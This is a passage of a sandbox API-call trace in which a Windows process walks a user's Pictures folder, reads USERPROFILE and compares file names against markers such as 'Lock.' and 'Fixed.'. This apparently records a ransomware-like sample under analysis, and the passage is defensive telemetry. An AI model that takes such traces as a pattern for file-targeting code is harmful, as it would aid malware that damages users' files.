(HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eb058 [0209.683] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x24 [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0209.683] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 0xffffffff [0209.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.684] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.684] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.684] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E8Pb7e.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Pb7e.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pb7e.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b7e.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7e.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0209.685] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ee0 [0209.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E8Pb7e.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Pb7e.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pb7e.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b7e.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7e.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0209.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0209.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.686] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0209.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.687] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.687] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.687] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0209.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.689] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.689] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: 